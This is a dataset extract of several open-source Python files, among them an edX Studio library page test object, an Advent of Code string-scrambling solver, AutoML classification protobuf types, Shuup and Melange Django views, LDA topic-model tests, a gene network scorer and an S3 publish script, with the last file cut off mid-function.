repo_name
stringlengths 5
92
| path
stringlengths 4
232
| copies
stringclasses 19
values | size
stringlengths 4
7
| content
stringlengths 721
1.04M
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 15
997
| alpha_frac
float64 0.25
0.97
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
nttks/edx-platform | common/test/acceptance/pages/studio/library.py | 1 | 11569 | """
Library edit page in Studio
"""
from bok_choy.javascript import js_defined, wait_for_js
from bok_choy.page_object import PageObject
from bok_choy.promise import EmptyPromise
from selenium.webdriver.support.select import Select
from .component_editor import ComponentEditorView
from .container import XBlockWrapper
from ...pages.studio.users import UsersPageMixin
from ...pages.studio.pagination import PaginatedMixin
from selenium.webdriver.common.keys import Keys
from ..common.utils import confirm_prompt, wait_for_notification
from . import BASE_URL
class LibraryPage(PageObject):
"""
Base page for Library pages. Defaults URL to the edit page.
"""
def __init__(self, browser, locator, course_locator):
super(LibraryPage, self).__init__(browser)
self.locator = locator
self.course_locator = course_locator
@property
def url(self):
"""
URL to the library edit page for the given library.
"""
return "{}/course/{}/library/{}".format(BASE_URL, unicode(self.course_locator), unicode(self.locator))
def is_browser_on_page(self):
"""
Returns True iff the browser has loaded the library edit page.
"""
return self.q(css='body.view-library').present
class LibraryEditPage(LibraryPage, PaginatedMixin, UsersPageMixin):
"""
Library edit page in Studio
"""
def get_header_title(self):
"""
The text of the main heading (H1) visible on the page.
"""
return self.q(css='h1.page-header-title').text
def wait_until_ready(self):
"""
When the page first loads, there is a loading indicator and most
functionality is not yet available. This waits for that loading to
finish.
Always call this before using the page. It also disables animations
for improved test reliability.
"""
self.wait_for_ajax()
super(LibraryEditPage, self).wait_until_ready()
@property
def xblocks(self):
"""
Return a list of xblocks loaded on the container page.
"""
return self._get_xblocks()
def are_previews_showing(self):
"""
Determines whether or not previews are showing for XBlocks
"""
return all([not xblock.is_placeholder() for xblock in self.xblocks])
def toggle_previews(self):
"""
Clicks the preview toggling button and waits for the previews to appear or disappear.
"""
toggle = not self.are_previews_showing()
self.q(css='.toggle-preview-button').click()
EmptyPromise(
lambda: self.are_previews_showing() == toggle,
'Preview is visible: %s' % toggle,
timeout=30
).fulfill()
self.wait_until_ready()
def click_duplicate_button(self, xblock_id):
"""
Click on the duplicate button for the given XBlock
"""
self._action_btn_for_xblock_id(xblock_id, "duplicate").click()
wait_for_notification(self)
self.wait_for_ajax()
def click_delete_button(self, xblock_id, confirm=True):
"""
Click on the delete button for the given XBlock
"""
self._action_btn_for_xblock_id(xblock_id, "delete").click()
if confirm:
confirm_prompt(self) # this will also wait_for_notification()
self.wait_for_ajax()
def _get_xblocks(self):
"""
Create an XBlockWrapper for each XBlock div found on the page.
"""
prefix = '.wrapper-xblock.level-page '
return self.q(css=prefix + XBlockWrapper.BODY_SELECTOR).map(
lambda el: XBlockWrapper(self.browser, el.get_attribute('data-locator'))
).results
def _div_for_xblock_id(self, xblock_id):
"""
Given an XBlock's usage locator as a string, return the WebElement for
that block's wrapper div.
"""
return self.q(css='.wrapper-xblock.level-page .studio-xblock-wrapper').filter(
lambda el: el.get_attribute('data-locator') == xblock_id
)
def _action_btn_for_xblock_id(self, xblock_id, action):
"""
Given an XBlock's usage locator as a string, return one of its action
buttons.
action is 'edit', 'duplicate', or 'delete'
"""
return self._div_for_xblock_id(xblock_id)[0].find_element_by_css_selector(
'.header-actions .{action}-button.action-button'.format(action=action)
)
class StudioLibraryContentEditor(ComponentEditorView):
"""
Library Content XBlock Modal edit window
"""
# Labels used to identify the fields on the edit modal:
LIBRARY_LABEL = "Library"
COUNT_LABEL = "Count"
SCORED_LABEL = "Scored"
PROBLEM_TYPE_LABEL = "Problem Type"
@property
def library_name(self):
""" Gets name of library """
return self.get_selected_option_text(self.LIBRARY_LABEL)
@library_name.setter
def library_name(self, library_name):
"""
Select a library from the library select box
"""
self.set_select_value(self.LIBRARY_LABEL, library_name)
EmptyPromise(lambda: self.library_name == library_name, "library_name is updated in modal.").fulfill()
@property
def count(self):
"""
Gets value of children count input
"""
return int(self.get_setting_element(self.COUNT_LABEL).get_attribute('value'))
@count.setter
def count(self, count):
"""
Sets value of children count input
"""
count_text = self.get_setting_element(self.COUNT_LABEL)
count_text.send_keys(Keys.CONTROL, "a")
count_text.send_keys(Keys.BACK_SPACE)
count_text.send_keys(count)
EmptyPromise(lambda: self.count == count, "count is updated in modal.").fulfill()
@property
def scored(self):
"""
Gets value of scored select
"""
value = self.get_selected_option_text(self.SCORED_LABEL)
if value == 'True':
return True
elif value == 'False':
return False
raise ValueError("Unknown value {value} set for {label}".format(value=value, label=self.SCORED_LABEL))
@scored.setter
def scored(self, scored):
"""
Sets value of scored select
"""
self.set_select_value(self.SCORED_LABEL, str(scored))
EmptyPromise(lambda: self.scored == scored, "scored is updated in modal.").fulfill()
@property
def capa_type(self):
"""
Gets value of CAPA type select
"""
return self.get_setting_element(self.PROBLEM_TYPE_LABEL).get_attribute('value')
@capa_type.setter
def capa_type(self, value):
"""
Sets value of CAPA type select
"""
self.set_select_value(self.PROBLEM_TYPE_LABEL, value)
EmptyPromise(lambda: self.capa_type == value, "problem type is updated in modal.").fulfill()
def set_select_value(self, label, value):
"""
Sets the select with given label (display name) to the specified value
"""
elem = self.get_setting_element(label)
select = Select(elem)
select.select_by_value(value)
@js_defined('window.LibraryContentAuthorView')
class StudioLibraryContainerXBlockWrapper(XBlockWrapper):
"""
Wraps :class:`.container.XBlockWrapper` for use with LibraryContent blocks
"""
url = None
def is_browser_on_page(self):
"""
Returns true iff the library content area has been loaded
"""
return self.q(css='article.content-primary').visible
def is_finished_loading(self):
"""
Returns true iff the Loading indicator is not visible
"""
return not self.q(css='div.ui-loading').visible
@classmethod
def from_xblock_wrapper(cls, xblock_wrapper):
"""
Factory method: creates :class:`.StudioLibraryContainerXBlockWrapper` from :class:`.container.XBlockWrapper`
"""
return cls(xblock_wrapper.browser, xblock_wrapper.locator)
def get_body_paragraphs(self):
"""
Gets library content body paragraphs
"""
return self.q(css=self._bounded_selector(".xblock-message-area p"))
@wait_for_js # Wait for the fragment.initialize_js('LibraryContentAuthorView') call to finish
def refresh_children(self):
"""
Click "Update now..." button
"""
btn_selector = self._bounded_selector(".library-update-btn")
self.wait_for_element_presence(btn_selector, 'Update now button is present.')
self.q(css=btn_selector).first.click()
# This causes a reload (see cms/static/xmodule_js/public/js/library_content_edit.js)
# Check that the ajax request that caused the reload is done.
# TODO self.wait_for_ajax()
# Then check that we are still on the right page.
self.wait_for(lambda: self.is_browser_on_page(), 'StudioLibraryContainerXBlockWrapper has reloaded.')
# Wait longer than the default 60 seconds, because this was intermittently failing on jenkins
# with the screenshot showing that the Loading indicator was still visible. See TE-745.
self.wait_for(lambda: self.is_finished_loading(), 'Loading indicator is not visible.', timeout=120)
# And wait to make sure the ajax post has finished.
self.wait_for_ajax()
self.wait_for_element_absence(btn_selector, 'Wait for the XBlock to finish reloading')
class LibraryHomePage(PageObject):
"""
Base page for Library pages. Defaults URL to the home page.
"""
def __init__(self, browser, course_locator):
super(LibraryHomePage, self).__init__(browser)
self.course_locator = course_locator
@property
def url(self):
"""
URL to the library home page for the given library.
"""
return "{}/course/{}/libhome/".format(BASE_URL, unicode(self.course_locator))
def is_browser_on_page(self):
"""
Returns True iff the browser has loaded the library home page.
"""
return self.q(css='.libraries').present
def has_new_library_button(self):
"""
(bool) is the "New Library" button present?
"""
return self.q(css='.new-library-button').present
def click_new_library(self):
"""
Click on the "New Library" button
"""
self.q(css='.new-library-button').first.click()
self.wait_for_ajax()
def is_new_library_form_visible(self):
"""
Is the new library form visisble?
"""
return self.q(css='.wrapper-create-library').visible
def fill_new_library_form(self, display_name, number):
"""
Fill out the form to create a new library.
Must have called click_new_library() first.
"""
field = lambda fn: self.q(css='.wrapper-create-library #new-library-{}'.format(fn))
field('name').fill(display_name)
field('number').fill(number)
def is_new_library_form_valid(self):
"""
IS the new library form ready to submit?
"""
return (
self.q(css='.wrapper-create-library .new-library-save:not(.is-disabled)').present and
not self.q(css='.wrapper-create-library .wrap-error.is-shown').present
)
def submit_new_library_form(self):
"""
Submit the new library form.
"""
self.q(css='.wrapper-create-library .new-library-save').click()
| agpl-3.0 | 3,979,192,120,614,835,000 | 33.126844 | 116 | 0.622007 | false |
tmct/adventOfCode2016 | problems/21/Solver.py | 1 | 4493 | import re
swap_positions_regex = r'swap position (\d+) with position (\d+)'
swap_letters_regex = r'swap letter (.) with letter (.)'
rotate_regex = r'rotate (left|right) (\d+)'
rotate_on_letter_position_regex = r'rotate based on position of letter (.)'
reverse_slice_regex = r'reverse positions (\d+) through (\d+)'
move_regex = r'move position (\d+) to position (\d+)'
class Solver:
def __init__(self, start_string, decrypt = False):
self.buffer = list(start_string)
self.instructions = []
self.decrypt = decrypt
self.reverse_shift = {int(i): int(j) for i, j in zip('13572460', '76542107')}
def solve(self, input_file_name):
intermediates = [''.join(self.buffer)]
with open(input_file_name, 'r') as input_file:
for line in input_file:
self.add_instruction(line.strip())
if self.decrypt:
self.instructions = self.instructions[::-1]
for instruction in self.instructions:
instruction()
# intermediates.append(''.join(self.buffer))
# if not self.decrypt:
# intermediates = intermediates[::-1]
# for i in intermediates:
# print(i)
return ''.join(self.buffer)
def add_instruction(self, instruction_string):
match = re.search(swap_positions_regex, instruction_string)
if match:
return self.add_swap_positions_instruction(match)
match = re.search(swap_letters_regex, instruction_string)
if match:
return self.add_swap_letters_instruction(match)
match = re.search(rotate_regex, instruction_string)
if match:
return self.add_rotate_instruction(match)
match = re.search(rotate_on_letter_position_regex, instruction_string)
if match:
return self.add_rotate_on_letter_position_instruction(match)
match = re.search(reverse_slice_regex, instruction_string)
if match:
return self.reverse_slice_instruction(match)
match = re.search(move_regex, instruction_string)
if match:
return self.move_instruction(match)
raise Exception('Could not parse line! "{}"'.format(instruction_string))
def add_swap_positions_instruction(self, match):
first, second = (int(group) for group in match.groups())
def swap_positions():
self.buffer[first], self.buffer[second] = self.buffer[second], self.buffer[first]
self.instructions.append(swap_positions)
def add_swap_letters_instruction(self, match):
def swap_letters():
first, second = (self.buffer.index(group) for group in match.groups())
self.buffer[first], self.buffer[second] = self.buffer[second], self.buffer[first]
self.instructions.append(swap_letters)
def add_rotate_instruction(self, match):
steps = int(match.group(2)) % len(self.buffer)
if match.group(1) == 'left':
steps = (len(self.buffer) - steps) % len(self.buffer)
if self.decrypt:
steps = (len(self.buffer) - steps) % len(self.buffer)
def rotate():
self.buffer = self.buffer[-steps:] + self.buffer[:-steps]
self.instructions.append(rotate)
def add_rotate_on_letter_position_instruction(self, match):
def rotate_on_letter_position():
if self.decrypt:
final_index = self.buffer.index(match.group(1)) % 8
steps = self.reverse_shift[final_index]
else:
steps = 1 + self.buffer.index(match.group(1))
if steps >= 5:
steps += 1
steps %= len(self.buffer)
self.buffer = self.buffer[-steps:] + self.buffer[:-steps]
self.instructions.append(rotate_on_letter_position)
def reverse_slice_instruction(self, match):
first, second = (int(group) for group in match.groups())
def reverse_slice():
self.buffer = self.buffer[:first] + self.buffer[first:second + 1][::-1] + self.buffer[second + 1:]
self.instructions.append(reverse_slice)
def move_instruction(self, match):
first, second = (int(group) for group in match.groups())
if self.decrypt:
first, second = second, first
def move():
value = self.buffer[first]
del self.buffer[first]
self.buffer.insert(second, value)
self.instructions.append(move)
| mit | 7,164,240,172,985,285,000 | 38.761062 | 110 | 0.605831 | false |
googleapis/python-automl | google/cloud/automl_v1beta1/types/classification.py | 1 | 13060 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
from google.cloud.automl_v1beta1.types import temporal
__protobuf__ = proto.module(
package="google.cloud.automl.v1beta1",
manifest={
"ClassificationType",
"ClassificationAnnotation",
"VideoClassificationAnnotation",
"ClassificationEvaluationMetrics",
},
)
class ClassificationType(proto.Enum):
r"""Type of the classification problem."""
CLASSIFICATION_TYPE_UNSPECIFIED = 0
MULTICLASS = 1
MULTILABEL = 2
class ClassificationAnnotation(proto.Message):
r"""Contains annotation details specific to classification.
Attributes:
score (float):
Output only. A confidence estimate between
0.0 and 1.0. A higher value means greater
confidence that the annotation is positive. If a
user approves an annotation as negative or
positive, the score value remains unchanged. If
a user creates an annotation, the score is 0 for
negative or 1 for positive.
"""
score = proto.Field(proto.FLOAT, number=1,)
class VideoClassificationAnnotation(proto.Message):
r"""Contains annotation details specific to video classification.
Attributes:
type_ (str):
Output only. Expresses the type of video classification.
Possible values:
- ``segment`` - Classification done on a specified by user
time segment of a video. AnnotationSpec is answered to be
present in that time segment, if it is present in any
part of it. The video ML model evaluations are done only
for this type of classification.
- ``shot``- Shot-level classification. AutoML Video
Intelligence determines the boundaries for each camera
shot in the entire segment of the video that user
specified in the request configuration. AutoML Video
Intelligence then returns labels and their confidence
scores for each detected shot, along with the start and
end time of the shot. WARNING: Model evaluation is not
done for this classification type, the quality of it
depends on training data, but there are no metrics
provided to describe that quality.
- ``1s_interval`` - AutoML Video Intelligence returns
labels and their confidence scores for each second of the
entire segment of the video that user specified in the
request configuration. WARNING: Model evaluation is not
done for this classification type, the quality of it
depends on training data, but there are no metrics
provided to describe that quality.
classification_annotation (google.cloud.automl_v1beta1.types.ClassificationAnnotation):
Output only . The classification details of
this annotation.
time_segment (google.cloud.automl_v1beta1.types.TimeSegment):
Output only . The time segment of the video
to which the annotation applies.
"""
type_ = proto.Field(proto.STRING, number=1,)
classification_annotation = proto.Field(
proto.MESSAGE, number=2, message="ClassificationAnnotation",
)
time_segment = proto.Field(proto.MESSAGE, number=3, message=temporal.TimeSegment,)
class ClassificationEvaluationMetrics(proto.Message):
r"""Model evaluation metrics for classification problems. Note: For
Video Classification this metrics only describe quality of the Video
Classification predictions of "segment_classification" type.
Attributes:
au_prc (float):
Output only. The Area Under Precision-Recall
Curve metric. Micro-averaged for the overall
evaluation.
base_au_prc (float):
Output only. The Area Under Precision-Recall
Curve metric based on priors. Micro-averaged for
the overall evaluation. Deprecated.
au_roc (float):
Output only. The Area Under Receiver
Operating Characteristic curve metric. Micro-
averaged for the overall evaluation.
log_loss (float):
Output only. The Log Loss metric.
confidence_metrics_entry (Sequence[google.cloud.automl_v1beta1.types.ClassificationEvaluationMetrics.ConfidenceMetricsEntry]):
Output only. Metrics for each confidence_threshold in
0.00,0.05,0.10,...,0.95,0.96,0.97,0.98,0.99 and
position_threshold = INT32_MAX_VALUE. ROC and
precision-recall curves, and other aggregated metrics are
derived from them. The confidence metrics entries may also
be supplied for additional values of position_threshold, but
from these no aggregated metrics are computed.
confusion_matrix (google.cloud.automl_v1beta1.types.ClassificationEvaluationMetrics.ConfusionMatrix):
Output only. Confusion matrix of the
evaluation. Only set for MULTICLASS
classification problems where number of labels
is no more than 10.
Only set for model level evaluation, not for
evaluation per label.
annotation_spec_id (Sequence[str]):
Output only. The annotation spec ids used for
this evaluation.
"""
class ConfidenceMetricsEntry(proto.Message):
r"""Metrics for a single confidence threshold.
Attributes:
confidence_threshold (float):
Output only. Metrics are computed with an
assumption that the model never returns
predictions with score lower than this value.
position_threshold (int):
Output only. Metrics are computed with an assumption that
the model always returns at most this many predictions
(ordered by their score, descendingly), but they all still
need to meet the confidence_threshold.
recall (float):
Output only. Recall (True Positive Rate) for
the given confidence threshold.
precision (float):
Output only. Precision for the given
confidence threshold.
false_positive_rate (float):
Output only. False Positive Rate for the
given confidence threshold.
f1_score (float):
Output only. The harmonic mean of recall and
precision.
recall_at1 (float):
Output only. The Recall (True Positive Rate)
when only considering the label that has the
highest prediction score and not below the
confidence threshold for each example.
precision_at1 (float):
Output only. The precision when only
considering the label that has the highest
prediction score and not below the confidence
threshold for each example.
false_positive_rate_at1 (float):
Output only. The False Positive Rate when
only considering the label that has the highest
prediction score and not below the confidence
threshold for each example.
f1_score_at1 (float):
Output only. The harmonic mean of
[recall_at1][google.cloud.automl.v1beta1.ClassificationEvaluationMetrics.ConfidenceMetricsEntry.recall_at1]
and
[precision_at1][google.cloud.automl.v1beta1.ClassificationEvaluationMetrics.ConfidenceMetricsEntry.precision_at1].
true_positive_count (int):
Output only. The number of model created
labels that match a ground truth label.
false_positive_count (int):
Output only. The number of model created
labels that do not match a ground truth label.
false_negative_count (int):
Output only. The number of ground truth
labels that are not matched by a model created
label.
true_negative_count (int):
Output only. The number of labels that were
not created by the model, but if they would,
they would not match a ground truth label.
"""
confidence_threshold = proto.Field(proto.FLOAT, number=1,)
position_threshold = proto.Field(proto.INT32, number=14,)
recall = proto.Field(proto.FLOAT, number=2,)
precision = proto.Field(proto.FLOAT, number=3,)
false_positive_rate = proto.Field(proto.FLOAT, number=8,)
f1_score = proto.Field(proto.FLOAT, number=4,)
recall_at1 = proto.Field(proto.FLOAT, number=5,)
precision_at1 = proto.Field(proto.FLOAT, number=6,)
false_positive_rate_at1 = proto.Field(proto.FLOAT, number=9,)
f1_score_at1 = proto.Field(proto.FLOAT, number=7,)
true_positive_count = proto.Field(proto.INT64, number=10,)
false_positive_count = proto.Field(proto.INT64, number=11,)
false_negative_count = proto.Field(proto.INT64, number=12,)
true_negative_count = proto.Field(proto.INT64, number=13,)
class ConfusionMatrix(proto.Message):
r"""Confusion matrix of the model running the classification.
Attributes:
annotation_spec_id (Sequence[str]):
Output only. IDs of the annotation specs used in the
confusion matrix. For Tables CLASSIFICATION
[prediction_type][google.cloud.automl.v1beta1.TablesModelMetadata.prediction_type]
only list of [annotation_spec_display_name-s][] is
populated.
display_name (Sequence[str]):
Output only. Display name of the annotation specs used in
the confusion matrix, as they were at the moment of the
evaluation. For Tables CLASSIFICATION
[prediction_type-s][google.cloud.automl.v1beta1.TablesModelMetadata.prediction_type],
distinct values of the target column at the moment of the
model evaluation are populated here.
row (Sequence[google.cloud.automl_v1beta1.types.ClassificationEvaluationMetrics.ConfusionMatrix.Row]):
Output only. Rows in the confusion matrix. The number of
rows is equal to the size of ``annotation_spec_id``.
``row[i].example_count[j]`` is the number of examples that
have ground truth of the ``annotation_spec_id[i]`` and are
predicted as ``annotation_spec_id[j]`` by the model being
evaluated.
"""
class Row(proto.Message):
r"""Output only. A row in the confusion matrix.
Attributes:
example_count (Sequence[int]):
Output only. Value of the specific cell in the confusion
matrix. The number of values each row has (i.e. the length
of the row) is equal to the length of the
``annotation_spec_id`` field or, if that one is not
populated, length of the
[display_name][google.cloud.automl.v1beta1.ClassificationEvaluationMetrics.ConfusionMatrix.display_name]
field.
"""
example_count = proto.RepeatedField(proto.INT32, number=1,)
annotation_spec_id = proto.RepeatedField(proto.STRING, number=1,)
display_name = proto.RepeatedField(proto.STRING, number=3,)
row = proto.RepeatedField(
proto.MESSAGE,
number=2,
message="ClassificationEvaluationMetrics.ConfusionMatrix.Row",
)
au_prc = proto.Field(proto.FLOAT, number=1,)
base_au_prc = proto.Field(proto.FLOAT, number=2,)
au_roc = proto.Field(proto.FLOAT, number=6,)
log_loss = proto.Field(proto.FLOAT, number=7,)
confidence_metrics_entry = proto.RepeatedField(
proto.MESSAGE, number=3, message=ConfidenceMetricsEntry,
)
confusion_matrix = proto.Field(proto.MESSAGE, number=4, message=ConfusionMatrix,)
annotation_spec_id = proto.RepeatedField(proto.STRING, number=5,)
__all__ = tuple(sorted(__protobuf__.manifest))
| apache-2.0 | 6,754,684,378,545,079,000 | 46.148014 | 134 | 0.633767 | false |
suutari/shoop | shuup/admin/modules/suppliers/views/edit.py | 1 | 1488 | # -*- coding: utf-8 -*-
# This file is part of Shuup.
#
# Copyright (c) 2012-2016, Shoop Commerce Ltd. All rights reserved.
#
# This source code is licensed under the AGPLv3 license found in the
# LICENSE file in the root directory of this source tree.
from __future__ import unicode_literals
from django import forms
from django.utils.translation import ugettext_lazy as _
from shuup.admin.utils.views import (
check_and_raise_if_only_one_allowed, CreateOrUpdateView
)
from shuup.core.models import Supplier
class SupplierForm(forms.ModelForm):
class Meta:
model = Supplier
exclude = ("module_data",)
widgets = {
"module_identifier": forms.Select
}
class SupplierEditView(CreateOrUpdateView):
model = Supplier
form_class = SupplierForm
template_name = "shuup/admin/suppliers/edit.jinja"
context_object_name = "supplier"
def get_object(self, queryset=None):
obj = super(SupplierEditView, self).get_object(queryset)
check_and_raise_if_only_one_allowed("SHUUP_ENABLE_MULTIPLE_SUPPLIERS", obj)
return obj
def get_form(self, form_class=None):
form = super(SupplierEditView, self).get_form(form_class=form_class)
choices = self.model.get_module_choices(
empty_label=(_("No %s module") % self.model._meta.verbose_name)
)
form.fields["module_identifier"].choices = form.fields["module_identifier"].widget.choices = choices
return form
| agpl-3.0 | 8,299,280,317,891,628,000 | 32.066667 | 108 | 0.684812 | false |
diging/tethne | tethne/tests/test_models_lda.py | 1 | 4504 | import sys
sys.path.append('../tethne')
import unittest
import tempfile
import os
from xml.etree import ElementTree as ET
import networkx as nx
import csv
from tethne.model.corpus.mallet import LDAModel
from tethne.readers.wos import read
from tethne import FeatureSet, tokenize
from tethne.networks import topics
datapath = './tethne/tests/data/wos3.txt'
import logging
logger = logging.getLogger('mallet')
logger.setLevel('DEBUG')
class TestLDAModel(unittest.TestCase):
def setUp(self):
corpus = read(datapath, index_by='wosid')
corpus.index_feature('abstract', tokenize, structured=True)
self.model = LDAModel(corpus, featureset_name='abstract')
self.model.fit(Z=20, max_iter=500)
def test_ldamodel(self):
dates, rep = self.model.topic_over_time(1)
self.assertGreater(sum(rep), 0)
self.assertEqual(len(dates), len(rep))
self.assertIsInstance(self.model.phi, FeatureSet)
self.assertIsInstance(self.model.theta, FeatureSet)
self.assertIsInstance(self.model.list_topics(), list)
self.assertGreater(len(self.model.list_topics()), 0)
self.assertIsInstance(self.model.list_topic(0), list)
self.assertGreater(len(self.model.list_topic(0)), 0)
def test_networks(self):
termGraph = topics.terms(self.model)
self.assertGreater(termGraph.size(), 100)
self.assertGreater(termGraph.order(), 10)
topicGraph = topics.cotopics(self.model)
self.assertGreater(topicGraph.size(), 5)
self.assertGreater(topicGraph.order(), 0)
paperGraph = topics.topic_coupling(self.model)
self.assertGreater(paperGraph.size(), 100)
self.assertGreater(paperGraph.order(), 20)
class TestLDAModelUnstructured(unittest.TestCase):
def setUp(self):
corpus = read(datapath, index_by='wosid')
corpus.index_feature('abstract', tokenize)
self.model = LDAModel(corpus, featureset_name='abstract')
self.model.fit(Z=20, max_iter=500)
def test_ldamodel(self):
dates, rep = self.model.topic_over_time(1)
self.assertGreater(sum(rep), 0)
self.assertEqual(len(dates), len(rep))
self.assertIsInstance(self.model.phi, FeatureSet)
self.assertIsInstance(self.model.theta, FeatureSet)
self.assertIsInstance(self.model.list_topics(), list)
self.assertGreater(len(self.model.list_topics()), 0)
self.assertIsInstance(self.model.list_topic(0), list)
self.assertGreater(len(self.model.list_topic(0)), 0)
def test_networks(self):
termGraph = topics.terms(self.model)
self.assertGreater(termGraph.size(), 100)
self.assertGreater(termGraph.order(), 10)
topicGraph = topics.cotopics(self.model)
self.assertGreater(topicGraph.size(), 5)
self.assertGreater(topicGraph.order(), 0)
paperGraph = topics.topic_coupling(self.model)
self.assertGreater(paperGraph.size(), 100)
self.assertGreater(paperGraph.order(), 20)
class TestLDAModelWithTransformation(unittest.TestCase):
def setUp(self):
corpus = read(datapath, index_by='wosid')
corpus.index_feature('abstract', tokenize)
xf = lambda f, c, C, DC: c*3
corpus.features['xf'] = corpus.features['abstract'].transform(xf)
self.model = LDAModel(corpus, featureset_name='xf')
self.model.fit(Z=20, max_iter=500)
def test_ldamodel(self):
dates, rep = self.model.topic_over_time(1)
self.assertGreater(sum(rep), 0)
self.assertEqual(len(dates), len(rep))
self.assertIsInstance(self.model.phi, FeatureSet)
self.assertIsInstance(self.model.theta, FeatureSet)
self.assertIsInstance(self.model.list_topics(), list)
self.assertGreater(len(self.model.list_topics()), 0)
self.assertIsInstance(self.model.list_topic(0), list)
self.assertGreater(len(self.model.list_topic(0)), 0)
def test_networks(self):
termGraph = topics.terms(self.model)
self.assertGreater(termGraph.size(), 100)
self.assertGreater(termGraph.order(), 10)
topicGraph = topics.cotopics(self.model)
self.assertGreater(topicGraph.size(), 5)
self.assertGreater(topicGraph.order(), 0)
paperGraph = topics.topic_coupling(self.model)
self.assertGreater(paperGraph.size(), 100)
self.assertGreater(paperGraph.order(), 20)
if __name__ == '__main__':
unittest.main()
| gpl-3.0 | 1,083,460,484,099,657,300 | 33.646154 | 73 | 0.672513 | false |
cemarchi/biosphere | Src/BioAnalyzer/Analysis/GenePrioritization/Steps/NetworkAnalysis/NetworkScoreAnalyzers/GeneNetworkScoreAnalyzer.py | 1 | 2431 | import operator
import networkx as nx
from scipy.stats import gmean
from Src.BioAnalyzer.Analysis.GenePrioritization.Steps.NetworkAnalysis.NetworkScoreAnalyzers.NetworkScoreAnalyzerBase \
import NetworkScoreAnalyzerBase
class GeneNetworkScoreAnalyzer(NetworkScoreAnalyzerBase):
def __init__(self):
pass
def calculate(self, network: nx.Graph) -> nx.Graph:
degree_centrality_measure = self.__get_centrality_measure(nx.degree_centrality(network))
page_rank_measure = self.__get_centrality_measure(nx.pagerank(network, alpha=0.85))
betweenness_measure = self.__get_centrality_measure(nx.betweenness_centrality(network))
hubs = None
authorities = None
try:
hubs, authorities = nx.hits(network)
except Exception:
pass
hubs_measure = self.__get_centrality_measure(hubs) if hubs else None
authorities_measure = self.__get_centrality_measure(authorities) if authorities else None
return self.__get_score(network, degree_centrality_measure, page_rank_measure, betweenness_measure,
hubs_measure, authorities_measure)
def __get_score(self, network, degree_centrality_measure, page_rank_measure, betweenness_measure, hubs_measure,
authorities_measure):
for node in network.node.keys():
score = []
if degree_centrality_measure and node in degree_centrality_measure:
score.append(degree_centrality_measure[node])
if page_rank_measure and node in page_rank_measure:
score.append(page_rank_measure[node])
if betweenness_measure and node in betweenness_measure:
score.append(betweenness_measure[node])
if hubs_measure and node in hubs_measure:
score.append(hubs_measure[node])
if authorities_measure and node in authorities_measure:
score.append(authorities_measure[node])
network.node[node]['centrality_value'] = gmean(score)
return network
def __get_centrality_measure(self, node_measurements):
nodes = sorted(node_measurements.items(), key=operator.itemgetter(1), reverse=True)
measurements = {}
measure = 1
for node, measure in nodes:
measurements[node] = measure
measure += 1
return measurements | bsd-3-clause | -5,332,966,840,455,512,000 | 35.298507 | 119 | 0.654463 | false |
smartystreets/jquery.liveaddress | resources/publish.py | 1 | 2128 | """
This script is used by SmartyStreets when deploying a new version of the jquery.liveaddress plugin.
"""
import os.path as path
import os
import sys
import boto
from boto.s3.bucket import Bucket
from boto.s3.connection import S3Connection, OrdinaryCallingFormat
from boto.s3.key import Key
from utils import get_mime_type
def main():
cloudfront_connection = boto.connect_cloudfront()
s3_connection = connect_to_s3()
bucket = Bucket(s3_connection, S3_BUCKET)
publish(bucket, cloudfront_connection)
def connect_to_s3():
"""
Workaround for '.' in bucket names when calling from Python 2.9+:
https://github.com/boto/boto/issues/2836#issuecomment-77283169
"""
if '.' in S3_BUCKET:
return S3Connection(calling_format=OrdinaryCallingFormat())
else:
return S3Connection()
def publish(bucket, cloudfront):
resources = []
for root, dirs, files in os.walk(WORKING_DIRECTORY):
for f in files:
if f not in EXCLUDES:
local_path = path.join(root, f)
resource_path = upload_to_s3(local_path, bucket)
resources.append(resource_path)
distribution = os.environ.get('AWS_CLOUDFRONT_DISTRIBUTION_ID') or raw_input('Enter the cloudfront distribution id: ')
distribution = distribution.strip()
if distribution:
print "Creating cloudfront invalidation for all uploaded resources..."
cloudfront.create_invalidation_request(distribution, resources)
def upload_to_s3(resource, bucket):
entry = Key(bucket)
entry.key = path.join(DESTINATION.format(VERSION), path.basename(resource))
entry.set_metadata('Content-Encoding', 'gzip')
entry.set_metadata('Content-Type', get_mime_type(resource))
print 'Publishing {0} to {1}...'.format(resource, entry.key)
entry.set_contents_from_filename(resource)
return entry.key
EXCLUDES = ['.DS_Store']
DESTINATION = '/jquery.liveaddress/{0}'
WORKING_DIRECTORY = '../workspace/'
S3_BUCKET = 'static.smartystreets.com'
VERSION = '.'.join(sys.argv[1].split('.')[0:2])
if __name__ == '__main__':
main()
| gpl-3.0 | 8,783,965,952,323,402,000 | 29.84058 | 122 | 0.681391 | false |
adviti/melange | app/soc/views/oauth.py | 1 | 4862 | #!/usr/bin/env python2.5
#
# Copyright 2011 the Melange authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module containing views for Open Auth.
"""
from django.conf.urls.defaults import url as django_url
from soc.views.helper.gdata_apis import oauth as oauth_helper
from soc.modules.gsoc.views.base import RequestHandler
from django.conf import settings
from django.utils import simplejson
class OAuthRedirectPage(RequestHandler):
"""Redirect page to Google Documents.
"""
def djangoURLPatterns(self):
patterns = [
django_url(r'^gdata/oauth/redirect$', self, name='gdata_oauth_redirect'),
]
return patterns
def checkAccess(self):
self.check.isUser()
def context(self):
service = oauth_helper.createDocsService(self.data)
next = '%s?next=%s' % (self.redirect.urlOf('gdata_oauth_verify'),
self.request.GET.get('next','/'))
url = oauth_helper.generateOAuthRedirectURL(
service, self.data.user,
next)
context = {
